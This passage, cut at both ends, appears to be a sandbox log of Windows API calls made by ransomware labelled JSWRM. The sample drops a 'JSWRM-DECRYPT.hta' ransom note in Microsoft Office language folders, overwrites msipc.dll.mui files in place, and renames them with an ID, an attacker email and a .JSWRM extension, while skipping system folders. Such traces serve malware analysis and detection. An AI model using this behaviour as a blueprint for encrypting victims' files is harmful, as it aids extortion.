lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pl\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pl\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.798] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22680) returned 1 [0136.798] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.798] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5890, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5890, lpOverlapped=0x0) returned 1 [0136.802] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.802] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5890, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5890, lpOverlapped=0x0) returned 1 [0136.802] CloseHandle (hObject=0x314) returned 1 [0136.802] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pl\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pl\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pl\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pl\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.803] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x69259a9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x69259a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69259a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.803] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0136.805] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="pt", cAlternateFileName="")) returned 1 [0136.805] lstrcmpiW (lpString1="pt", lpString2=".") returned 1 [0136.805] lstrcmpiW (lpString1="pt", lpString2="..") returned 1 [0136.805] lstrcmpiW (lpString1="pt", lpString2="...") returned 1 [0136.805] lstrcmpiW (lpString1="pt", lpString2="windows") returned -1 [0136.805] lstrcmpiW (lpString1="pt", lpString2="recovery") returned -1 [0136.805] lstrcmpiW (lpString1="pt", lpString2="perflogs") returned 1 [0136.805] lstrcmpiW (lpString1="pt", lpString2="documents and settings") returned 1 [0136.805] lstrcmpiW (lpString1="pt", lpString2="$RECYCLE.BIN") returned 1 [0136.805] lstrcmpiW (lpString1="pt", lpString2="system volume information") returned -1 [0136.805] lstrcmpiW (lpString1="pt", lpString2="msocache") returned 1 [0136.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt\\jswrm-decrypt.hta")) returned 0xffffffff [0136.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.806] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.806] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.807] CloseHandle (hObject=0x238) returned 1 [0136.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt\\jswrm-decrypt.hta")) returned 0x20 [0136.808] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x48348526, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232140 [0136.808] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.808] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x48348526, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.808] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.808] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.808] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48348526, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48348526, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48348526, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.808] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.808] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.808] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.808] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.808] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.808] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.808] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.808] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.808] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.809] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.809] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.809] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.809] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22168) returned 1 [0136.810] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.810] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5690, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5690, lpOverlapped=0x0) returned 1 [0136.813] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.813] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5690, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5690, lpOverlapped=0x0) returned 1 [0136.813] CloseHandle (hObject=0x314) returned 1 [0136.813] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.814] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.814] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0136.814] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2=".") returned 1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2="..") returned 1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2="...") returned 1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2="windows") returned -1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2="recovery") returned -1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2="perflogs") returned 1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2="documents and settings") returned 1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2="$RECYCLE.BIN") returned 1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2="system volume information") returned -1 [0136.814] lstrcmpiW (lpString1="pt-BR", lpString2="msocache") returned 1 [0136.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt-br\\jswrm-decrypt.hta")) returned 0xffffffff [0136.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt-br\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.815] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.815] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.816] CloseHandle (hObject=0x238) returned 1 [0136.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt-BR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt-br\\jswrm-decrypt.hta")) returned 0x20 [0136.817] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt-BR\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48348526, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232140 [0136.817] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.817] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48348526, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.817] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.817] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.817] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48348526, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48348526, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4836e9e9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.817] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.817] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.817] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.817] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.817] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.818] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.818] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.818] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.818] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.818] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.818] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\pt-BR\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\pt-br\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.819] GetFileSizeEx (in: hFile=0x314, 